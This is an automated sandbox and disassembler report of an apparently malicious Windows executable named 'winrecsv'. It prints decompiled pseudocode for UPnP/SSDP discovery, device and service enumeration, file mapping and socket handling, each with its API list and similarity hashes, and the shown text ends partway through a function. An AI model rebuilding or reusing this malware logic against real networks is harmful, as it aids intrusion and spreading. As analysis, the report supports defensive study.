                                                                                  			E0040C840(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                  				char _v1028;
                                                                                  				char _v1029;
                                                                                  				intOrPtr _v1036;
                                                                                  				char* _v1040;
                                                                                  				char* _v1044;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				_t20 = __eax;
                                                                                  				_v1029 = 0;
                                                                                  				_v1036 = 0;
                                                                                  				while(_v1036 < 2) {
                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                  					if(_t20 != 0xffffffff) {
                                                                                  						_v1029 = 1;
                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                  							if(_v1040 != 0) {
                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                  								_t29 = E0040B640(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                  								_t37 = _t37 + 8;
                                                                                  								 *_a8 = _t29;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						Sleep(0x3e8);
                                                                                  					}
                                                                                  					_t20 = _v1036 + 1;
                                                                                  					_v1036 = _t20;
                                                                                  				}
                                                                                  				return _v1029;
                                                                                  			}
                                                                                  Instruction addresses for the listing above (decompiler line map; per-line pairing lost in extraction):
                                                                                  0x0040c840 0x0040c849 0x0040c850 0x0040c86b 0x0040c88e 0x0040c897 0x0040c8a6 0x0040c8c3 0x0040c8d7 0x0040c8e4 0x0040c8ef 0x0040c912 0x0040c917 0x0040c91d 0x0040c91d 0x0040c8e4 0x0040c899 0x0040c89e 0x0040c89e 0x0040c862 0x0040c865 0x0040c865 0x0040c92d

                                                                                  APIs
                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleeprecvfrom
                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                  • API String ID: 668330359-3973262388
                                                                                  • Opcode ID: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction ID: 9b34ca997a713d65cf6cd99f526d658ac5dfd41d516b48eadd98018a806326ed
                                                                                  • Opcode Fuzzy Hash: 2f358190d0f743e2d07f95898b3a29db7e7050231e642a267277ee9338021237
                                                                                  • Instruction Fuzzy Hash: 98216FF1940218EBDB20DB64DC89BE97774AB04308F1486E9E709B72C0D7B95AC68F5C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040A020() {
                                                                                  				void* _v8;
                                                                                  				signed int _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				long _v24;
                                                                                  				DWORD* _v28;
                                                                                  				signed int _v32;
                                                                                  				intOrPtr _t41;
                                                                                  				void* _t74;
                                                                                  
                                                                                  				InitializeCriticalSection(0x414e4c);
                                                                                  				_v12 = 0;
                                                                                  				while(_v12 < 0x200) {
                                                                                  					E00409D70( *((intOrPtr*)(0x4133b8 + _v12 * 4)), E0040C210(), 0);
                                                                                  					_t74 = _t74 + 0xc;
                                                                                  					_v12 = _v12 + 1;
                                                                                  				}
                                                                                  				_v8 = CreateFileW(0x414c40, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v16 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v16 != 0) {
                                                                                  						_v20 = MapViewOfFile(_v16, 4, 0, 0, 0);
                                                                                  						if(_v20 != 0) {
                                                                                  							_v24 = GetFileSize(_v8, 0);
                                                                                  							_v28 = 0;
                                                                                  							_v32 = 0;
                                                                                  							while(_v28 < _v24 && _v32 < 0x200) {
                                                                                  								E00409D70( *((intOrPtr*)(_v20 + _v32 * 8)), E0040C210() -  *((intOrPtr*)(_v20 + 4 + _v32 * 8)), 0);
                                                                                  								_t74 = _t74 + 0xc;
                                                                                  								_v28 =  &(_v28[2]);
                                                                                  								_v32 = _v32 + 1;
                                                                                  							}
                                                                                  							UnmapViewOfFile(_v20);
                                                                                  						}
                                                                                  						CloseHandle(_v16);
                                                                                  					}
                                                                                  					CloseHandle(_v8);
                                                                                  				}
                                                                                  				E00409A90();
                                                                                  				_t41 =  *0x414e68; // 0x0
                                                                                  				return E0040BF50(_t41, 0, E00409960, 0, 0, 0);
                                                                                  			}

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(00414E4C,?,?,?,?,?,?,004068A0), ref: 0040A02B
                                                                                  • CreateFileW.KERNEL32(00414C40,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040A07D
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040A09E
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040A0BD
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040A0D2
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040A138
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A142
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040A14C
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 439099756-0
                                                                                  • Opcode ID: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction ID: acc5326b5384c580b36ed7733cff79295e061d02a32601855545f98bc6dcfb13
                                                                                  • Opcode Fuzzy Hash: 97191d7563d11220bb9c43c848a5229161b8639f145c7d4a366d64e3fea0f839
                                                                                  • Instruction Fuzzy Hash: 4D413A74E40308ABDB10DFA4CC4ABAEB774BB44704F208569E6117B2C1C6B96A51CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00404200() {
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				long _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				void* _t35;
                                                                                  				intOrPtr _t45;
                                                                                  				void* _t66;
                                                                                  				void* _t67;
                                                                                  
                                                                                  				InitializeCriticalSection(0x4143f0);
                                                                                  				_t35 = CreateFileW(0x414620, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				_v8 = _t35;
                                                                                  				if(_v8 != 0xffffffff) {
                                                                                  					_v12 = CreateFileMappingW(_v8, 0, 2, 0, 0, 0);
                                                                                  					if(_v12 == 0) {
                                                                                  						L14:
                                                                                  						return CloseHandle(_v8);
                                                                                  					}
                                                                                  					_v16 = MapViewOfFile(_v12, 4, 0, 0, 0);
                                                                                  					if(_v16 == 0) {
                                                                                  						L13:
                                                                                  						CloseHandle(_v12);
                                                                                  						goto L14;
                                                                                  					}
                                                                                  					_v20 = GetFileSize(_v8, 0);
                                                                                  					_v24 = _v16;
                                                                                  					while(_v20 != 0) {
                                                                                  						if(_v20 >= 0x100) {
                                                                                  							_t45 = E0040B4F0(_v24, _v24);
                                                                                  							_t67 = _t66 + 4;
                                                                                  							_v28 = _t45;
                                                                                  							if(_v28 != 0) {
                                                                                  								_v20 = _v20 - 0x100;
                                                                                  								if(_v20 >=  *((intOrPtr*)(_v28 + 0xc))) {
                                                                                  									E004040F0(_v24, _v28, _v24,  *((intOrPtr*)(_v28 + 0xc)) + 0x100, 0);
                                                                                  									_t66 = _t67 + 0x10;
                                                                                  									_v20 = _v20 -  *((intOrPtr*)(_v28 + 0xc));
                                                                                  									continue;
                                                                                  								}
                                                                                  								E00408FB0(_v28);
                                                                                  								break;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						break;
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v16);
                                                                                  					goto L13;
                                                                                  				}
                                                                                  				return _t35;
                                                                                  			}

                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(004143F0,?,?,?,?,?,0040686A), ref: 0040420B
                                                                                  • CreateFileW.KERNEL32(00414620,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,0040686A), ref: 00404225
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00404246
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00404265
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040427E
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040430B
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00404315
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040431F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                  • String ID:
                                                                                  • API String ID: 3956458805-0
                                                                                  • Opcode ID: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction ID: 273e13aa2dc466d5bf8d435bda3035c4f53c51da1c9f1d325813a3c854b8a587
                                                                                  • Opcode Fuzzy Hash: b3648e58c9864d6b8b8bc5f3b80ef7b3f109043bc3ac7d8c402e44e73b7fa38e
                                                                                  • Instruction Fuzzy Hash: 2C3133B4E00209EFDB14DFA4DC49FAEB770AB88704F208569F601772C1D7B96581CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CC90(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"device") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"deviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction ID: 46634be8c8d3b4bec74d72c832fec089d40fd577d228b9d0a634236a651e6f02
                                                                                  • Opcode Fuzzy Hash: ea68b65162a0bfbb9c3a4dcc947aafaa99d256b286d0777428a079b1f42d990b
                                                                                  • Instruction Fuzzy Hash: 2341DA75A0020ADFCB04DF98C884BEFBBB5BF48304F108269E515A7390D778AE81CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 48%
                                                                                  			E0040CAB0(intOrPtr* _a4, WCHAR* _a8) {
                                                                                  				char _v8;
                                                                                  				WCHAR* _v12;
                                                                                  				WCHAR* _v16;
                                                                                  				void* _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				WCHAR* _v32;
                                                                                  				intOrPtr* _t65;
                                                                                  				void* _t99;
                                                                                  
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_push( &_v8);
                                                                                  				_push(_a4);
                                                                                  				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_v20 = 0;
                                                                                  						_push( &_v20);
                                                                                  						_push(_v16);
                                                                                  						_push(_a4);
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                  							L21:
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						} else {
                                                                                  							_v24 = 0;
                                                                                  							_push( &_v24);
                                                                                  							_push(_v20);
                                                                                  							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                  								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                  									_t65 = E0040C5B0(_v20, L"serviceType");
                                                                                  									_t99 = _t99 + 8;
                                                                                  									_v28 = _t65;
                                                                                  									if(_v28 != 0) {
                                                                                  										_v32 = 0;
                                                                                  										_push( &_v32);
                                                                                  										_push(_v28);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                  											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                  												_v12 = _v20;
                                                                                  											}
                                                                                  											__imp__#6(_v32);
                                                                                  										}
                                                                                  										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                  									}
                                                                                  								}
                                                                                  								__imp__#6(_v24);
                                                                                  							}
                                                                                  							if(_v12 == 0) {
                                                                                  								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                  								goto L21;
                                                                                  							} else {
                                                                                  							}
                                                                                  						}
                                                                                  						goto L22;
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _v12;
                                                                                  			}

                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,service), ref: 0040CB6C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CBBB
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBCF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CBE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: service$serviceType
                                                                                  • API String ID: 1602765415-3667235276
                                                                                  • Opcode ID: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction ID: 6fe4328499d7c23ea6979e2b1e9447d84fd35b94008c8ce13c1bdcec141f7028
                                                                                  • Opcode Fuzzy Hash: 51323dc4f173722060747d42b15ee01fc61d8dc6540b40af0163292d053a9315
                                                                                  • Instruction Fuzzy Hash: 3641FB75A0020ADFDB04CF98D885BAFB7B5BF48304F208269E515B7390D778AD85CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E0040E330(intOrPtr __eax, void* _a4) {
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t20;
                                                                                  				long _t28;
                                                                                  				long _t37;
                                                                                  				intOrPtr _t45;
                                                                                  				struct _CRITICAL_SECTION* _t48;
                                                                                  				long _t49;
                                                                                  				void* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t55;
                                                                                  
                                                                                  				_t53 = _a4;
                                                                                  				_t45 = __eax;
                                                                                  				if(_t53 != 0xffffffff) {
                                                                                  					_t48 = __eax + 0x20;
                                                                                  					_t37 = 0;
                                                                                  					EnterCriticalSection(_t48);
                                                                                  					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                  					if(_t20 != 0) {
                                                                                  						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                  							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                  							if(_t20 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  							}
                                                                                  							goto L7;
                                                                                  						}
                                                                                  						_t37 = 1;
                                                                                  					}
                                                                                  					L7:
                                                                                  					LeaveCriticalSection(_t48);
                                                                                  					if(_t37 == 0) {
                                                                                  						_t49 = E00408E40(0x284);
                                                                                  						_t55 = _t54 + 4;
                                                                                  						if(_t49 == 0) {
                                                                                  							L13:
                                                                                  							E00409940(_t53);
                                                                                  							return _t49;
                                                                                  						} else {
                                                                                  							_t7 = _t49 + 0x264; // 0x264
                                                                                  							 *_t49 = 0x69636c69;
                                                                                  							 *(_t49 + 0x260) = _t53;
                                                                                  							_a4 = 0x10;
                                                                                  							__imp__#5(_t53, _t7,  &_a4);
                                                                                  							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                  								E00408FB0(_t49);
                                                                                  								_t55 = _t55 + 4;
                                                                                  								_t49 = 0;
                                                                                  								goto L13;
                                                                                  							} else {
                                                                                  								_t28 = E0040C210();
                                                                                  								_t13 = _t49 + 4; // 0x4
                                                                                  								InterlockedExchange(_t13, _t28);
                                                                                  								_t14 = _t49 + 0x244; // 0x244
                                                                                  								_t15 = _t49 + 8; // 0x8
                                                                                  								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                  								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                  								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                  								InitializeCriticalSection(_t14);
                                                                                  								InterlockedIncrement(_t45 + 0x3c);
                                                                                  								E0040E250(_t49);
                                                                                  								return _t49;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						return 0;
                                                                                  					}
                                                                                  				} else {
                                                                                  					return 0;
                                                                                  				}
                                                                                   			}


                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E83B,00000000), ref: 0040E34A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0040E83B,00000000), ref: 0040E36E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                  • String ID:
                                                                                  • API String ID: 3168844106-0
                                                                                  • Opcode ID: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction ID: 62d1bf2d84e0e1ba2e0a99c8f5ab924b94ee3ffd36670832191e74fbf46375e2
                                                                                  • Opcode Fuzzy Hash: 4c18b106db5567132990545b499aae1f321c72ca226fb5bf17456008ad49864f
                                                                                  • Instruction Fuzzy Hash: F231D172201605ABC310ABB6EC48AD7B7E8FB44724F04893EF95DD3251DB39A4548B98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CCD1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
                                                                                  					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                  					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                  						L18:
                                                                                  						continue;
                                                                                  					} else {
                                                                                  						L4:
                                                                                  						 *(_t85 - 0x14) = 0;
                                                                                  						_push(_t85 - 0x14);
                                                                                  						_push( *(_t85 - 0x10));
                                                                                  						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                  							L6:
                                                                                  							if(lstrcmpiW( *(_t85 - 0x14), L"device") == 0) {
                                                                                  								L7:
                                                                                  								 *((intOrPtr*)(_t85 - 0x18)) = E0040C5B0( *(_t85 - 0x10), L"deviceType");
                                                                                  								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                  									L8:
                                                                                  									 *(_t85 - 0x1c) = 0;
                                                                                  									_push(_t85 - 0x1c);
                                                                                  									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                  										L10:
                                                                                  										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                  											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                  										}
                                                                                  										L12:
                                                                                  										__imp__#6( *(_t85 - 0x1c));
                                                                                  									}
                                                                                  									L13:
                                                                                  									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                  								}
                                                                                  							}
                                                                                  							L14:
                                                                                  							__imp__#6( *(_t85 - 0x14));
                                                                                  						}
                                                                                  						L15:
                                                                                  						if( *(_t85 - 8) == 0) {
                                                                                  							L17:
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                  							goto L18;
                                                                                  						}
                                                                                  					}
                                                                                  					break;
                                                                                  				}
                                                                                  				L19:
                                                                                  				return  *(_t85 - 8);
                                                                                   			}


                                                                                  APIs
                                                                                  • lstrcmpiW.KERNEL32(00000000,device), ref: 0040CD4C
                                                                                  • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040CD9B
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDAF
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040CDC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeStringlstrcmpi
                                                                                  • String ID: device$deviceType
                                                                                  • API String ID: 1602765415-3511266565
                                                                                  • Opcode ID: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction ID: 6e690da79745c02a31a5bb20c3c2194b08e0ef47a7b2c4a2d0bea9277cba1ccd
                                                                                  • Opcode Fuzzy Hash: c34f562bf250ec4fdba221dbdec4349d49427810adf770fab84b3680e3f9f1ae
                                                                                  • Instruction Fuzzy Hash: 5A31CA75A1020ADFCB04DF99D884BEFBBB5BF88304F108669E515B7390D778A981CB94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 55%
                                                                                  			E0040CAF1() {
                                                                                  				void* _t85;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                  					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                  						break;
                                                                                  					}
                                                                                  					L2:
                                                                                  					 *(_t85 - 0x10) = 0;
                                                                                  					_push(_t85 - 0x10);
